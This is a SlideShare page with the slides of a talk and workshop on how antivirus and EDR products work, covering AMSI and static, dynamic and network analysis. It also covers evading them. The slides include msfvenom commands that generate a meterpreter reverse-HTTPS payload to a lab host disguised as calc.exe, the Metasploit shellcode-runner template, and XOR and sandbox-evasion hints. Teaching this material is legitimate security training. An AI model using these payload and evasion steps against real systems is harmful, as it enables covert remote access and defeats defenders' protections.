SlideShare uma empresa Scribd logo

How the antiviruses work

D
Dawid Golak

Presentation on AV and their operation. Some information about static, dynamic and network activities. AMSI, metasploit templates and signing binary file

Internet
1 de 27
Baixar para ler offline
HOW THE ANTIVIRUSES WORKBEHIND THE AV LINE https://twitter.com/dawid_golak
BEHIND THE AV LINE ANTIVIRUSES https://www.av-comparatives.org/list-of-enterprise-av-vendors-pc/
BEHIND THE AV LINE BEYOND THE ANTIVIRUS, OR THE WORLD OF EDR ▸ Usually two components. ▸ Kernel mode (one or more drivers) - processes monitoring ▸ Usermode (usually as a service) - supporting function reinstall/update - API hooking in the process
AMSIANTIMALWARE SCAN INTERFACE
BEHIND THE AV LINE AMSI ▸ The Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product that's present on a machine. ▸ AMSI provides enhanced malware protection for your end-users and their data, applications, and workloads. https://github.com/BC-SECURITY/DEFCON27/blob/master/Introduction_to_AMSI_Bypasses_and_Sandbox_Evasion.pdf
BEHIND THE AV LINE WINDOWS COMPONENTS THAT INTEGRATE WITH AMSI ▸ User Account Control, or UAC (elevation of EXE, COM, MSI, or ActiveX installation) ▸ PowerShell (scripts, interactive use, and dynamic code evaluation) ▸ Windows Script Host (wscript.exe and cscript.exe) ▸ JavaScript and VBScript ▸ Office VBA macros
BEHIND THE AV LINE AMSI https://github.com/BC-SECURITY/DEFCON27/blob/master/Introduction_to_AMSI_Bypasses_and_Sandbox_Evasion.pdf
BINARY VS SCRIPTING
STATIC DYNAMIC NETWORK CATCHME, IF YOU CAN
BEHIND THE AV LINE STATIC ANALYSIS ▸ Copy ▸ move ▸ delete ▸ view ▸ touch }
BEHIND THE AV LINE STATIC ANALYSIS - VIRUSTOTAL.COM
BEHIND THE AV LINE DYNAMIC ANALYSIS ▸ Sandbox
BEHIND THE AV LINE NETWORK ANALYSIS
BEHIND THE AV LINE NETWORK ANALYSIS
METASPLOIT HOW THE TEMPLATES WORK
BEHIND THE AV LINE MSF TEMPLATES ▸ msfvenom -p windows/[x86/x64]/meterpreter/reverse_https LHOST=10.0.2.16 LPORT=443 -f exe —o calc.exe ▸ /usr/share/metasploit-framework/data/templates/src/pe/exe #include <stdio.h> #define SCSIZE 4096 char payload[SCSIZE] = "PAYLOAD:"; char comment[512] = ""; int main(int argc, char **argv) { (*(void (*)()) payload)(); return(0); }
LET'S WALK THE WALK, AND STOP TALK THE TALK WORKSHOP
PE FILE
BEHIND THE AV LINE MSFVENOM SAMPLE - BYPASS STATIC ANALYSIS ▸ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.2.16 LPORT=443 -f hex ▸ xor [+hint]
BEHIND THE AV LINE MSFVENOM SAMPLE - BYPASS STATIC ANALYSIS i.e. windows defender: https://github.com/matterpreter/DefenderCheck
BEHIND THE AV LINE WHERE IS MY DATA ▸ char shellcode[] = “xfcx48x83x..x…..”; ▸ .text ▸ .data ▸ .rscr
BEHIND THE AV LINE BYPASS DYNAMIC ▸ hint 0x01
BEHIND THE AV LINE BYPASS DYNAMIC ▸ hint 0x02
BEHIND THE AV LINE BYPASS DYNAMIC ▸ hint 0x03
BEHIND THE AV LINE BYPASS DYNAMIC ▸ workstation fingerprint
WHAT’S NEXT?
THX

Recomendados

Amethyst: The Gem in the Rust
Amethyst: The Gem in the RustAmethyst: The Gem in the Rust
Amethyst: The Gem in the Rust
Lucio Franco
 
Kali linux useful tools
Kali linux useful toolsKali linux useful tools
Kali linux useful tools
milad mahdavi
 
Внедрение безопасности в веб-приложениях в среде выполнения
Внедрение безопасности в веб-приложениях в среде выполненияВнедрение безопасности в веб-приложениях в среде выполнения
Внедрение безопасности в веб-приложениях в среде выполнения
Positive Hack Days
 
Penetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemPenetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection System
Bikrant Gautam
 
Technical Architecture of RASP Technology
Technical Architecture of RASP TechnologyTechnical Architecture of RASP Technology
Technical Architecture of RASP Technology
Priyanka Aash
 
Synack Shakacon OSX Malware Persistence
Synack Shakacon OSX Malware PersistenceSynack Shakacon OSX Malware Persistence
Synack Shakacon OSX Malware Persistence
Ivan Einstein
 
Injecting Security into vulnerable web apps at Runtime
Injecting Security into vulnerable web apps at RuntimeInjecting Security into vulnerable web apps at Runtime
Injecting Security into vulnerable web apps at Runtime
Ajin Abraham
 
incs775_lect6.ppt
incs775_lect6.pptincs775_lect6.ppt
incs775_lect6.ppt
webhostingguy
 

Recomendados

Amethyst: The Gem in the Rust
Amethyst: The Gem in the RustAmethyst: The Gem in the Rust
Amethyst: The Gem in the Rust
Lucio Franco
 
Kali linux useful tools
Kali linux useful toolsKali linux useful tools
Kali linux useful tools
milad mahdavi
 
Внедрение безопасности в веб-приложениях в среде выполнения
Внедрение безопасности в веб-приложениях в среде выполненияВнедрение безопасности в веб-приложениях в среде выполнения
Внедрение безопасности в веб-приложениях в среде выполнения
Positive Hack Days
 
Penetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemPenetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection System
Bikrant Gautam
 
Technical Architecture of RASP Technology
Technical Architecture of RASP TechnologyTechnical Architecture of RASP Technology
Technical Architecture of RASP Technology
Priyanka Aash
 
Synack Shakacon OSX Malware Persistence
Synack Shakacon OSX Malware PersistenceSynack Shakacon OSX Malware Persistence
Synack Shakacon OSX Malware Persistence
Ivan Einstein
 
Injecting Security into vulnerable web apps at Runtime
Injecting Security into vulnerable web apps at RuntimeInjecting Security into vulnerable web apps at Runtime
Injecting Security into vulnerable web apps at Runtime
Ajin Abraham
 
incs775_lect6.ppt
incs775_lect6.pptincs775_lect6.ppt
incs775_lect6.ppt
webhostingguy
 
2600 av evasion_deuce
2600 av evasion_deuce2600 av evasion_deuce
2600 av evasion_deuce
Db Cooper
 
Getting Started With Virtualization
Getting Started With VirtualizationGetting Started With Virtualization
Getting Started With Virtualization
Bill Kalarness
 
점진적인 레거시 웹 애플리케이션 개선 과정
점진적인 레거시 웹 애플리케이션 개선 과정점진적인 레거시 웹 애플리케이션 개선 과정
점진적인 레거시 웹 애플리케이션 개선 과정
Arawn Park
 
Automating Security Testing with the OWTF
Automating Security Testing with the OWTFAutomating Security Testing with the OWTF
Automating Security Testing with the OWTF
Jerod Brennen
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
Felipe Prado
 
Cm5 secure code_training_1day_system configuration
Cm5 secure code_training_1day_system configurationCm5 secure code_training_1day_system configuration
Cm5 secure code_training_1day_system configuration
dcervigni
 
Command line for the beginner - Using the command line in developing for the...
Command line for the beginner - Using the command line in developing for the...Command line for the beginner - Using the command line in developing for the...
Command line for the beginner - Using the command line in developing for the...
Jim Birch
 
Windows Command Line Tools
Windows Command Line ToolsWindows Command Line Tools
Windows Command Line Tools
love4upratik
 
Macdoored
MacdooredMacdoored
Macdoored
Shakacon
 
SaltConf14 - Ben Cane - Using SaltStack in High Availability Environments
SaltConf14 - Ben Cane - Using SaltStack in High Availability EnvironmentsSaltConf14 - Ben Cane - Using SaltStack in High Availability Environments
SaltConf14 - Ben Cane - Using SaltStack in High Availability Environments
SaltStack
 
Intrusion Techniques
Intrusion TechniquesIntrusion Techniques
Intrusion Techniques
Festival Software Livre
 
Serverless - minimizing the attack surface
Serverless - minimizing the attack surfaceServerless - minimizing the attack surface
Serverless - minimizing the attack surface
Avi Shulman
 
Two Years, Zero servers: Lessons learned from running a startup 100% on Serve...
Two Years, Zero servers: Lessons learned from running a startup 100% on Serve...Two Years, Zero servers: Lessons learned from running a startup 100% on Serve...
Two Years, Zero servers: Lessons learned from running a startup 100% on Serve...
Cloud Native Day Tel Aviv
 
System Hardening Using Ansible
System Hardening Using AnsibleSystem Hardening Using Ansible
System Hardening Using Ansible
Sonatype
 
Continuous Deployment with Amazon Web Services by Carlos Conde
Continuous Deployment with Amazon Web Services by Carlos Conde Continuous Deployment with Amazon Web Services by Carlos Conde
Continuous Deployment with Amazon Web Services by Carlos Conde
Codemotion
 
Internship msc cs
Internship msc csInternship msc cs
Internship msc cs
Pooja Bhojwani
 
Platform manifesto
Platform manifestoPlatform manifesto
Platform manifesto
Nic Cheneweth
 
Fine line between performance and security
Fine line between performance and securityFine line between performance and security
Fine line between performance and security
Almudena Vivanco
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
azida3
 
OWASP_Top_Ten_Proactive_Controls version 2
OWASP_Top_Ten_Proactive_Controls version 2OWASP_Top_Ten_Proactive_Controls version 2
OWASP_Top_Ten_Proactive_Controls version 2
ssuser18349f1
 
TORTOGEL TELAH MENJADI SALAH SATU PLATFORM PERMAINAN PALING FAVORIT.
TORTOGEL TELAH MENJADI SALAH SATU PLATFORM PERMAINAN PALING FAVORIT.TORTOGEL TELAH MENJADI SALAH SATU PLATFORM PERMAINAN PALING FAVORIT.
TORTOGEL TELAH MENJADI SALAH SATU PLATFORM PERMAINAN PALING FAVORIT.
Tortogel
 
How Do I Begin the Linksys Velop Setup Process?
How Do I Begin the Linksys Velop Setup Process?How Do I Begin the Linksys Velop Setup Process?
How Do I Begin the Linksys Velop Setup Process?
Linksys Velop Login
 

Mais conteúdo relacionado

Semelhante a How the antiviruses work

2600 av evasion_deuce
2600 av evasion_deuce2600 av evasion_deuce
2600 av evasion_deuce
Db Cooper
 
Automating Security Testing with the OWTF
Automating Security Testing with the OWTFAutomating Security Testing with the OWTF
Automating Security Testing with the OWTF
Jerod Brennen
 
Windows Command Line Tools
Windows Command Line ToolsWindows Command Line Tools
Windows Command Line Tools
love4upratik
 
System Hardening Using Ansible
System Hardening Using AnsibleSystem Hardening Using Ansible
System Hardening Using Ansible
Sonatype
 
Continuous Deployment with Amazon Web Services by Carlos Conde
Continuous Deployment with Amazon Web Services by Carlos Conde Continuous Deployment with Amazon Web Services by Carlos Conde
Continuous Deployment with Amazon Web Services by Carlos Conde
Codemotion
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
azida3
 

Semelhante a How the antiviruses work (20)

2600 av evasion_deuce
2600 av evasion_deuce2600 av evasion_deuce
2600 av evasion_deuce
 
Getting Started With Virtualization
Getting Started With VirtualizationGetting Started With Virtualization
Getting Started With Virtualization
 
점진적인 레거시 웹 애플리케이션 개선 과정
점진적인 레거시 웹 애플리케이션 개선 과정점진적인 레거시 웹 애플리케이션 개선 과정
점진적인 레거시 웹 애플리케이션 개선 과정
 
Automating Security Testing with the OWTF
Automating Security Testing with the OWTFAutomating Security Testing with the OWTF
Automating Security Testing with the OWTF
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
 
Cm5 secure code_training_1day_system configuration
Cm5 secure code_training_1day_system configurationCm5 secure code_training_1day_system configuration
Cm5 secure code_training_1day_system configuration
 
Command line for the beginner - Using the command line in developing for the...
Command line for the beginner - Using the command line in developing for the...Command line for the beginner - Using the command line in developing for the...
Command line for the beginner - Using the command line in developing for the...
 
Windows Command Line Tools
Windows Command Line ToolsWindows Command Line Tools
Windows Command Line Tools
 
Macdoored
MacdooredMacdoored
Macdoored
 
SaltConf14 - Ben Cane - Using SaltStack in High Availability Environments
SaltConf14 - Ben Cane - Using SaltStack in High Availability EnvironmentsSaltConf14 - Ben Cane - Using SaltStack in High Availability Environments
SaltConf14 - Ben Cane - Using SaltStack in High Availability Environments
 
Intrusion Techniques
Intrusion TechniquesIntrusion Techniques
Intrusion Techniques
 
Serverless - minimizing the attack surface
Serverless - minimizing the attack surfaceServerless - minimizing the attack surface
Serverless - minimizing the attack surface
 
Two Years, Zero servers: Lessons learned from running a startup 100% on Serve...
Two Years, Zero servers: Lessons learned from running a startup 100% on Serve...Two Years, Zero servers: Lessons learned from running a startup 100% on Serve...
Two Years, Zero servers: Lessons learned from running a startup 100% on Serve...
 
System Hardening Using Ansible
System Hardening Using AnsibleSystem Hardening Using Ansible
System Hardening Using Ansible
 
Continuous Deployment with Amazon Web Services by Carlos Conde
Continuous Deployment with Amazon Web Services by Carlos Conde Continuous Deployment with Amazon Web Services by Carlos Conde
Continuous Deployment with Amazon Web Services by Carlos Conde
 
Internship msc cs
Internship msc csInternship msc cs
Internship msc cs
 
Platform manifesto
Platform manifestoPlatform manifesto
Platform manifesto
 
Fine line between performance and security
Fine line between performance and securityFine line between performance and security
Fine line between performance and security
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
OWASP_Top_Ten_Proactive_Controls version 2
OWASP_Top_Ten_Proactive_Controls version 2OWASP_Top_Ten_Proactive_Controls version 2
OWASP_Top_Ten_Proactive_Controls version 2
 

Último

audience research (emma) 1.pptxkkkkkkkkkkkkkkkkk
audience research (emma) 1.pptxkkkkkkkkkkkkkkkkkaudience research (emma) 1.pptxkkkkkkkkkkkkkkkkk
audience research (emma) 1.pptxkkkkkkkkkkkkkkkkk
lolsDocherty
 
Production 2024 sunderland culture final - Copy.pptx
Production 2024 sunderland culture final - Copy.pptxProduction 2024 sunderland culture final - Copy.pptx
Production 2024 sunderland culture final - Copy.pptx
ChloeMeadows1
 

Último (16)

TORTOGEL TELAH MENJADI SALAH SATU PLATFORM PERMAINAN PALING FAVORIT.
TORTOGEL TELAH MENJADI SALAH SATU PLATFORM PERMAINAN PALING FAVORIT.TORTOGEL TELAH MENJADI SALAH SATU PLATFORM PERMAINAN PALING FAVORIT.
TORTOGEL TELAH MENJADI SALAH SATU PLATFORM PERMAINAN PALING FAVORIT.
 
How Do I Begin the Linksys Velop Setup Process?
How Do I Begin the Linksys Velop Setup Process?How Do I Begin the Linksys Velop Setup Process?
How Do I Begin the Linksys Velop Setup Process?
 
Statistical Analysis of DNS Latencies.pdf
Statistical Analysis of DNS Latencies.pdfStatistical Analysis of DNS Latencies.pdf
Statistical Analysis of DNS Latencies.pdf
 
I’ll See Y’All Motherfuckers In Game 7 Shirt
I’ll See Y’All Motherfuckers In Game 7 ShirtI’ll See Y’All Motherfuckers In Game 7 Shirt
I’ll See Y’All Motherfuckers In Game 7 Shirt
 
Premier Mobile App Development Agency in USA.pdf
Premier Mobile App Development Agency in USA.pdfPremier Mobile App Development Agency in USA.pdf
Premier Mobile App Development Agency in USA.pdf
 
Thank You Luv I’ll Never Walk Alone Again T shirts
Thank You Luv I’ll Never Walk Alone Again T shirtsThank You Luv I’ll Never Walk Alone Again T shirts
Thank You Luv I’ll Never Walk Alone Again T shirts
 
Cyber Security Services Unveiled: Strategies to Secure Your Digital Presence
Cyber Security Services Unveiled: Strategies to Secure Your Digital PresenceCyber Security Services Unveiled: Strategies to Secure Your Digital Presence
Cyber Security Services Unveiled: Strategies to Secure Your Digital Presence
 
Development Lifecycle.pptx for the secure development of apps
Development Lifecycle.pptx for the secure development of appsDevelopment Lifecycle.pptx for the secure development of apps
Development Lifecycle.pptx for the secure development of apps
 
Reggie miller choke t shirtsReggie miller choke t shirts
Reggie miller choke t shirtsReggie miller choke t shirtsReggie miller choke t shirtsReggie miller choke t shirts
Reggie miller choke t shirtsReggie miller choke t shirts
 
Topology of the Network class 8 .ppt pdf
Topology of the Network class 8 .ppt pdfTopology of the Network class 8 .ppt pdf
Topology of the Network class 8 .ppt pdf
 
audience research (emma) 1.pptxkkkkkkkkkkkkkkkkk
audience research (emma) 1.pptxkkkkkkkkkkkkkkkkkaudience research (emma) 1.pptxkkkkkkkkkkkkkkkkk
audience research (emma) 1.pptxkkkkkkkkkkkkkkkkk
 
Pvtaan Social media marketing proposal.pdf
Pvtaan Social media marketing proposal.pdfPvtaan Social media marketing proposal.pdf
Pvtaan Social media marketing proposal.pdf
 
The Use of AI in Indonesia Election 2024: A Case Study
The Use of AI in Indonesia Election 2024: A Case StudyThe Use of AI in Indonesia Election 2024: A Case Study
The Use of AI in Indonesia Election 2024: A Case Study
 
iThome_CYBERSEC2024_Drive_Into_the_DarkWeb
iThome_CYBERSEC2024_Drive_Into_the_DarkWebiThome_CYBERSEC2024_Drive_Into_the_DarkWeb
iThome_CYBERSEC2024_Drive_Into_the_DarkWeb
 
Production 2024 sunderland culture final - Copy.pptx
Production 2024 sunderland culture final - Copy.pptxProduction 2024 sunderland culture final - Copy.pptx
Production 2024 sunderland culture final - Copy.pptx
 
Bug Bounty Blueprint : A Beginner's Guide
Bug Bounty Blueprint : A Beginner's GuideBug Bounty Blueprint : A Beginner's Guide
Bug Bounty Blueprint : A Beginner's Guide
 

How the antiviruses work

  • 1. HOW THE ANTIVIRUSES WORKBEHIND THE AV LINE https://twitter.com/dawid_golak
  • 2. BEHIND THE AV LINE ANTIVIRUSES https://www.av-comparatives.org/list-of-enterprise-av-vendors-pc/
  • 3. BEHIND THE AV LINE BEYOND THE ANTIVIRUS, OR THE WORLD OF EDR ▸ Usually two components. ▸ Kernel mode (one or more drivers) - processes monitoring ▸ Usermode (usually as a service) - supporting function reinstall/update - API hooking in the process
  • 5. BEHIND THE AV LINE AMSI ▸ The Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product that's present on a machine. ▸ AMSI provides enhanced malware protection for your end-users and their data, applications, and workloads. https://github.com/BC-SECURITY/DEFCON27/blob/master/Introduction_to_AMSI_Bypasses_and_Sandbox_Evasion.pdf
  • 6. BEHIND THE AV LINE WINDOWS COMPONENTS THAT INTEGRATE WITH AMSI ▸ User Account Control, or UAC (elevation of EXE, COM, MSI, or ActiveX installation) ▸ PowerShell (scripts, interactive use, and dynamic code evaluation) ▸ Windows Script Host (wscript.exe and cscript.exe) ▸ JavaScript and VBScript ▸ Office VBA macros
  • 7. BEHIND THE AV LINE AMSI https://github.com/BC-SECURITY/DEFCON27/blob/master/Introduction_to_AMSI_Bypasses_and_Sandbox_Evasion.pdf
  • 10. BEHIND THE AV LINE STATIC ANALYSIS ▸ Copy ▸ move ▸ delete ▸ view ▸ touch }
  • 11. BEHIND THE AV LINE STATIC ANALYSIS - VIRUSTOTAL.COM
  • 12. BEHIND THE AV LINE DYNAMIC ANALYSIS ▸ Sandbox
  • 13. BEHIND THE AV LINE NETWORK ANALYSIS
  • 14. BEHIND THE AV LINE NETWORK ANALYSIS
  • 16. BEHIND THE AV LINE MSF TEMPLATES ▸ msfvenom -p windows/[x86/x64]/meterpreter/reverse_https LHOST=10.0.2.16 LPORT=443 -f exe —o calc.exe ▸ /usr/share/metasploit-framework/data/templates/src/pe/exe #include <stdio.h> #define SCSIZE 4096 char payload[SCSIZE] = "PAYLOAD:"; char comment[512] = ""; int main(int argc, char **argv) { (*(void (*)()) payload)(); return(0); }
  • 17. LET'S WALK THE WALK, AND STOP TALK THE TALK WORKSHOP
  • 19. BEHIND THE AV LINE MSFVENOM SAMPLE - BYPASS STATIC ANALYSIS ▸ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.2.16 LPORT=443 -f hex ▸ xor [+hint]
  • 20. BEHIND THE AV LINE MSFVENOM SAMPLE - BYPASS STATIC ANALYSIS i.e. windows defender: https://github.com/matterpreter/DefenderCheck
  • 21. BEHIND THE AV LINE WHERE IS MY DATA ▸ char shellcode[] = “xfcx48x83x..x…..”; ▸ .text ▸ .data ▸ .rscr
  • 22. BEHIND THE AV LINE BYPASS DYNAMIC ▸ hint 0x01
  • 23. BEHIND THE AV LINE BYPASS DYNAMIC ▸ hint 0x02
  • 24. BEHIND THE AV LINE BYPASS DYNAMIC ▸ hint 0x03
  • 25. BEHIND THE AV LINE BYPASS DYNAMIC ▸ workstation fingerprint
  • 27. THX